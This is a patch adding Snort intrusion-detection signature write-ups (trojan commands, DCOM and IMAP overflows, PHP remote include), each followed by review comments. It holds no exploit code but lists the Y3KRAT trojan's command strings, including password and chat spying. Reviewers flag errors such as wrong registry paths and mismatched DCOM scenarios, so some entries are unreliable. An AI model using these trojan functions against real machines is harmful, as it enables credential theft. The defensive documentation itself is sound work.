+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
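Review bot: "false postives from occuring" (in both Summary and Detailed Information) should be "false positives from occurring". More substantively, the text says the rule "is used in conjunction with other rules" but does not say how it does so or which rules depend on it, so an analyst who disables it to save cycles has no way to know what breaks; add that information.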
--- /dev/null
+++ b/doc/signatures/3082.txt
@@ -0,0 +1,145 @@
+Rule: 
+
+--
+Sid: 
+3082
+-- 
+Summary: 
+This event is generated when a Y3KRAT 1.5 client attempts to respond to the Y3KRAT 1.5 server.
+
+-- 
+Impact: 
+If connected, the attacker could execute a multitude of functions resulting in a complete compromise of the victim's machine.
+
+--
+Detailed Information:
+Y3KRAT 1.5 uses port 5880 by default. This port can be changed by the attacker. 
+
+The following is a list of the commands for many of Y3KRAT 1.5's functions (Command Name: Command String):
+
+AIM Passwords: aolpwd
+AIM Spy: aolspy
+Change Internet Explorer Caption: changeiecaptest
+Chat With Server: chatsrvY3K Rat user
+Clipboard: pastefromclip
+Change Desktop Color Scheme: clsys
+Change Recycle Bin Name: nrbin
+Change System Name: sysname
+Change Time: time
+Video List: getvideolist
+Dialup: autoconnect
+Access Directories: getclientgetpaths
+Get Directory Paths: getpaths
+Disable Mouse Buttons: dbuttons
+Disable Num Lock: dnumlock
+Disable System Keys: dsyskeys
+Disable All Keys: dkeys{all}
+DOS Commands: doscommands
+Fast Mouse: fastmouseon
+Find File: findfile
+Flip Screen: flip1hor
+FTP: openftp21
+Go To URL: gotourl
+Hide Taskbar: hidetask
+Hide Clock: hideclock
+Hide Desktop Icons: hidedeskicons
+Hide Start Button: hidestart
+Hide System Tray: hidesystray
+ICQ Information: getclienticqinfo
+ICQ Passwords: geticqpass
+ICQ Spy: icqspy
+Internet Explorer Spy: iespy
+General Information: general
+Lights On: lightson
+Lights Off: lightsoff
+Live Shot: cap
+Logged Passwords: getpasses
+Logoff: boot41
+Make File: makefile
+Matrix Chat: matrix
+Modify File (Read System File): readsysfiles
+Modify File (Write System File): writesysfiles
+Monitor Off: enablestandby
+Mouse Settings (Set Position): setpos
+Mouse Settings (Freeze Mouse Position): freezepos
+Mouse Settings (Speed Up Cursor): speedcursor
+MSN Spy: msnspy
+Napster Spy: napsterspy
+Net Get: netget
+NetStat (Read): netstatread
+NetStat (Kill): netstatkill
+CD-ROM open: cdopen
+CD-ROM close: cdclose
+Open File: getfiles
+Overclock: upmhz
+Play Sound: snd (*followed by the sound, for example, err for the error sound*)
+Power Off: boot31
+Print: print
+Ras Passwords: getras
+Remove Server: killserver
+Change Resolution: setdevmode
+Restart: boot21
+Safe Mode: safemode
+Screenshot: cap
+Send Keys: sendtextf
+Send Message: messText
+Show Windows With Text: showwin
+Shutdown: boot11
+Swap Mouse Buttons: swapbuttons
+Write System Error: writesystem
+Yahoo Spy: yahoospy
+
+
+--
+Affected Systems:
+	Windows 95, 98, ME, NT, 2000
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the attacker enters the IP address and 
+presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+Remove the Dcomcnofg key located at the following places in the registry:
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\Run 
+HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\CurrentVersion\RunServices
+HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Run
+
+Reboot the computer or close Dcomcnofg.exe.
+
+Delete Dcomcnofg.exe from the windows system directory.
+
+If found, delete server.exe and kill the process called server.exe.
+
+--
+Contributors:
+Sourcefire Research Team
+Ricky Macatee <rmacatee@sourcefire.com> 
+
+-- 
+Additional References:
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/y3krat/15/index.shtml
+
+--
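Review bot: the registry paths in Corrective Action are wrong: the hive is HKEY_LOCAL_MACHINE (no trailing S), and the default-user hive under HKEY_USERS is ".DEFAULT", not "Default"; a reader pasting these paths into regedit will not find the keys. The Summary says the "client attempts to respond to the server", while Attack Scenarios describes the attacker's client connecting to the server on the victim; pick one direction so the reader knows whether this rule fires on victim-to-attacker or attacker-to-victim traffic. Minor: the "--" separator after the Sid lacks the blank line used everywhere else, and "Live Shot" and "Screenshot" are both listed as "cap"; if that is intentional, a word saying so would stop it looking like a copy-paste error.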
--- /dev/null
+++ b/doc/signatures/2273.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2273
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to an
+IMAP server using brute force methods.
+
+--
+Impact:
+Attempted remote access.  
+This event may indicate that an attacker is attempting to guess username 
+and password combinations. Alternately, it may indicate that an authorized 
+user has entered an incorrect username and password combination a number 
+of times.
+
+--
+Detailed Information:
+An IMAP server will issue an error message after a failed login attempt.  
+This may be an indication of an attacker attempting brute force guessing 
+of username and password combinations.  It is also possible that an authorized 
+user has incorrectly entered a legitimate username and password combination.  
+
+This event will be generated after a number of failed attempts, in this
+case thirty attempted logins in thirty seconds.
+
+--
+Affected Systems:
+IMAP servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to guess username and password combinations.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event may be triggered by a failed IMAP login attempt from a remote user.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Investigate the host for signs of compromise.
+
+Check mail logs for repeated failed attempts to login using 
+one or more usernames.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
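Review bot: the False Positives section ("a failed IMAP login attempt from a remote user") contradicts the Detailed Information, which says the event fires only after thirty failed logins in thirty seconds; a single mistyped password will not trigger it. The realistic false positive is a mail client or automated fetcher retrying a stale password in a tight loop, and the text should say so. Corrective Action could also mention checking whether the targeted usernames exist and applying a lockout or rate limit on the IMAP server, since "investigate the host for signs of compromise" alone does not stop an ongoing guessing run.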
--- /dev/null
+++ b/doc/signatures/3084.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+3084
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the Veritas Back Exec Agent Browser.
+
+--
+Impact:
+Serious. Execution of arbitrary commands may be possible.
+
+--
+Detailed Information:
+
+The Veritas Backup Agent Browser is the server component of the Backup
+Exec software employed to provide a backup solution.  Client agents
+communicate with the Backup Agent Browser.  A registration request from
+a client that contains an overly long hostname value can cause a buffer
+overflow and the subsequent execution of arbitrary code on a vulnerable
+server.
+
+--
+Affected Systems:
+Veritas Software Backup Exec 8.0, 8.5, 8.6, 9.0, 9.1
+
+--
+Attack Scenarios:
+An attacker can craft a registration request that contains an overly
+long hostname, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current nonaffected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
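Review bot: the product is named three different ways: "Veritas Back Exec Agent Browser" in the Summary (typo for Backup), "Veritas Backup Agent Browser" in Detailed Information, and "Backup Exec" in Affected Systems; use "Veritas Backup Exec Agent Browser" throughout. Additional References is empty; the vendor advisory or CVE for the overly long hostname registration overflow should be cited so the reader can check which of the listed 8.x and 9.x versions are fixed.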
--- /dev/null
+++ b/doc/signatures/2148.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 2148
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the BLNews php application. 
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a vulnerability in the BLNews PHP application.
+
+It is possible for an attacker to include a PHP file of his choosing via a URL, the script is processed and executed with the privileges of the user running the webserver.
+
+--
+Affected Systems:
+Any host using BLNews.
+
+--
+Attack Scenarios:
+An attacker could include a PHP file of his choice by including the file name in a URI supplied to the webserver that would in turn process the script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host.
+
+Check the webserver log files for signs of this activity.
+
+Where possible, ensure the webserver is run as an unprivileged process.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7677
+
+--
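Review bot: the Detailed Information never names the vulnerable script or parameter through which the PHP file is included, so the reader cannot tell what the rule matches or verify a hit in the web server logs that Corrective Action tells them to check; name it. "Check the php implementation on the host" is also too vague to act on; for a remote include the concrete check is whether include() is allowed to fetch remote URLs (the allow_url_fopen setting in php.ini), and the advice should say so.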
--- /dev/null
+++ b/doc/signatures/1692.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1692
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
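Review bot: this file is missing the Affected Systems section that every other file in the patch has; add it with the Oracle versions the command applies to. The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" is copied from a telnet rule and does not belong in a description of Oracle commands sent to the listener; remove it. The Attack Scenarios entry ("Simple. These are Oracle database commands.") is an Ease of Attack answer, not a scenario; it should describe what the attacker does with the command (the Detailed Information already lists gaining administrator privileges, adding users and deleting data). Finally, the ORACLE_PORTS guidance appears twice (Detailed Information and False Negatives); keep it in one place, and the Summary should name the command the rule matches rather than "a command".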
--- /dev/null
+++ b/doc/signatures/2146.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid: 2146
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the php application TextPortal. 
+
+--
+Impact:
+Potential administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to supply a known default administrator password for the php application TextPortal.
+
+The default administrator account 'god2' has known, weak passwords that could be used by an attacker to gain unauthorized access to the application.
+
+
+--
+Affected Systems:
+Any host using TextPortal.
+
+--
+Attack Scenarios:
+An attacker can log in to the application using the account god2 and gain administrator access to the site.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Disable the god2 account.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/7673
+
+--
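Review bot: the Detailed Information says the god2 account "has known, weak passwords" but does not say which password string the rule matches, so an analyst cannot confirm a hit from the request. Corrective Action should lead with changing that password or removing the default account (the "Disable the god2 account" line) rather than "Check the php implementation on the host", which is unrelated to a default-credential problem.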
--- /dev/null
+++ b/doc/signatures/3161.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3161
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
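Review bot: same text as 3407.txt and 3340.txt in this patch, "Expoit" typo and empty Additional References included. Please state what SID 3161 specifically detects (transport, port or exploit stage) so the DCOM entries are distinguishable from one another.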
--- /dev/null
+++ b/doc/signatures/2371.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2371
+
+--
+Summary:
+This event is generated when an attempt is made to access
+Sample_showcode.html, a component of the Niti Telecom Caravan Business
+Server.
+
+--
+Impact:
+Information disclosure. Possible directory traversal.
+
+--
+Detailed Information:
+Caravan Business Server is used to develop web applications. It is
+possible for an external user to perform a directory traversal attack
+against the server by maipulating the parameter fname in the
+Sample_showcode.html file.
+
+--
+Affected Systems:
+	Caravan Business Server 2.00/03D
+
+--
+Attack Scenarios:
+An attacker can view files on the system by performaing a directory
+traversal attack using the fname parameter in the Sample_showcode.html
+script.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <matthew.watchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
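Review bot: two typos, "maipulating" in Detailed Information and "performaing" in Attack Scenarios, should be "manipulating" and "performing". The Impact section lists "Possible directory traversal", which is the technique rather than the impact; the impact is disclosure of files readable by the server process, which Attack Scenarios already states. Additional References is empty; a Bugtraq or vendor reference for the Caravan Business Server 2.00/03D issue would let the reader confirm the affected version.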
--- /dev/null
+++ b/doc/signatures/3238.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3238
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
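Review bot: fourth verbatim copy of the DCOM text in this patch (see 3407.txt). Beyond the shared "Expoit" typo and empty Additional References, the file should say what distinguishes SID 3238 from SIDs 3407, 3340 and 3161.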
--- /dev/null
+++ b/doc/signatures/100000115.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+100000115
+
+-- 
+Summary: 
+This event is generated when the PHP-Nuke program's Web_Links module is access 
+with a NULL value for the CID parameter.
+
+-- 
+
+Impact: 
+Sensitive path information may be disclosed, allowing an attacker to conduct 
+reconnaissance against the affected host.
+
+--
+Detailed Information:
+Queries made to PHP-Nuke's Web_Links module which omit the CID parameter, or 
+which leave its value blank, will generate an error that discloses sensitive 
+path information about the affected host.
+
+--
+Affected Systems:
+PHP-Nuke 6.0
+PHP-Nuke 6.5
+PHP-Nuke 6.5 RC1
+PHP-Nuke 6.5 RC2
+PHP-Nuke 6.5 RC3
+PHP-Nuke 6.5 BETA 1
+PHP-Nuke 6.5 FINAL
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser.
+-- 
+
+Ease of Attack: 
+Simple, as example exploit URIs exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+An unsupported fix exists at the URI referenced in the Additional References 
+section. No vendor-supplied patch or workaround exists.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.securityfocus.com/archive/1/321313
+
+--
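Review bot: the Summary says the module is accessed "with a NULL value for the CID parameter", while Detailed Information says queries "which omit the CID parameter, or which leave its value blank" trigger the error. A rule matching request content can see an empty parameter value but not an omitted parameter, so the text should say which case the rule actually fires on. Grammar: "is access with" should be "is accessed with". Affected Systems lists "PHP-Nuke 6.5" and "PHP-Nuke 6.5 FINAL" as separate entries; if these are the same release, merge them. Contributors is the only entry in the patch without the research team line; check whether that is intended.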
--- /dev/null
+++ b/doc/signatures/1930.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1930
+
+--
+Summary:
+This event is generated when a remote attacker sends an overly long
+argument in the AUTH command to an internal IMAP server, indicating an
+attempt to exploit a buffer overflow vulnerability in Netscape Messaging
+Server and University of Washington IMAP implementations. This may also
+affect other IMAP server implementations.
+
+--
+Impact:
+Remote execution of arbitrary code with the security privileges of the
+IMAP process, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+A buffer overflow vulnerability exists in the AUTHENTICATE command in
+University of Washington IMAP and Netscape Messaging Server. This can
+allow a remote attacker to send an AUTHENTICATE command with a
+malformed, overlong argument to a vulnerable IMAP server, causing a
+buffer overflow condition. The attacker can then execute arbitrary code
+on the server with the security privileges of the IMAP server process.
+
+--
+Affected Systems:
+	Netscape Messaging Server 3.55 and earlier
+	University of Washington imapd 10.234 and earlier.
+
+--
+Attack Scenarios:
+An attacker sends an overly long, malformed argument to an AUTHENTICATE
+command to a vulnerable IMAP server, causing a buffer overflow
+condition. The attacker may then be able to execute arbitrary code on the
+server with the security privileges of the IMAP server process.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Patches have been released for both UW IMAP and Netscape Messaging
+Server. Apply the patch or upgrade to a Netscape Messaging Server
+version higher than 3.55 or UW IMAP version higher than 10.234.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/130
+
+--
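Review bot: the Summary refers to the "AUTH command" while Detailed Information and Attack Scenarios say "AUTHENTICATE"; the IMAP command is AUTHENTICATE, so use that name throughout. Otherwise the entry is in good shape: affected versions, impact and the Bugtraq reference (bid 130) are all present. One small addition: Detailed Information could state what argument length the rule treats as "overly long", since that threshold is what a false negative would hinge on.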
--- /dev/null
+++ b/doc/signatures/3165.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3165
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
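Review bot: the Attack Scenarios section ("a request for a file with an overly long filename via a network share") does not match the Detailed Information above it, which describes malformed RPC data sent to a DCOM endpoint; one of the two should be corrected so the reader knows what traffic the rule actually matches. Note also that this file is word-for-word identical to 3284.txt and 3348.txt later in this patch, so nothing tells the analyst how sid 3165 differs from those rules; each file should at least say which RPC interface or request the rule looks for. Fix "Expoit" to "Exploit" in Ease of Attack, and since the section asserts that exploit code exists, Additional References should not be empty: add the vendor security bulletin for this DCOM vulnerability.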
--- /dev/null
+++ b/doc/signatures/1850.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1850
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
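Review bot: this documentation is entirely generic (it never names the CGI script, application or vulnerability that sid 1850 detects) and the same text is reused unchanged for 1933.txt and 1642.txt further down, so an analyst triaging the alert learns nothing specific from it. The Summary and Detailed Information should name the targeted script or application and Additional References should carry the corresponding advisory, especially since Ease of Attack claims "Exploits exist." Minor: "running ona web server" should read "running on a web server", and "attackers choosing" should be "attacker's choosing" (twice).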
--- /dev/null
+++ b/doc/signatures/1231.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1231
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
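Review bot: the Summary and Detailed Information never identify which web server or application vulnerability sid 1231 matches, and the Attack Scenarios line ("from simple directory traversal to exploitation of buffer overflow conditions") covers every possible web attack; the same boilerplate is duplicated unchanged as 1193.txt later in this patch. Add the specific request or URI the rule looks for and the related advisory under Additional References, which is empty despite "Exploits exist." Minor: "attackers choosing" should be "attacker's choosing".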
--- /dev/null
+++ b/doc/signatures/3454.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3454
+
+--
+Summary:
+This event is generated when an attempt is made to probe for
+information on a host running Arkeia Client Backup server.
+
+--
+Impact:
+This may be reconnaissance to find version or operating
+system information about the Arkeia Client Backup server
+to later run an appropriate exploit.
+
+--
+Detailed Information:
+By default, Arkeia Client Backup servers do not require any
+authentication for informational requests.  An attacker who
+may be planning to exploit a vulnerable version of the software
+may attempt to request file or system information.
+
+--
+Affected Systems:
+	Arkeia version 5.3 and prior.
+
+--
+Attack Scenarios:
+An attacker can attempt to query an Arkeia Client Backup
+server for system or file information.
+
+--
+Ease of Attack:
+Simple.  Exploits are publicly available.
+
+--
+False Positives:
+None known. If you run Arkeia Client Backup on your network,
+make sure that your the variable $EXTERNAL_NET is configured
+to reflect IP addresses outside of your network.  Otherwise,
+this rule will alert on valid internal traffic.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Metasploit:
+http://metasploit.com/research/arkeia_agent
+
+--
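Review bot: the False Positives section contradicts itself: it opens with "None known." and then describes a real false-positive condition (legitimate internal Arkeia traffic alerting when $EXTERNAL_NET is left at its default). Drop the "None known." sentence and keep the $EXTERNAL_NET guidance, and fix "make sure that your the variable" to "make sure that the variable". Also add the missing colon after "Additional References" so the section header matches the other files in this patch. Ease of Attack says "Exploits are publicly available" for what the Summary calls an information probe; either say the probe itself needs no exploit or clarify that the exploits target the subsequent vulnerability, not the reconnaissance this rule detects.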
--- /dev/null
+++ b/doc/signatures/3284.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3284
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
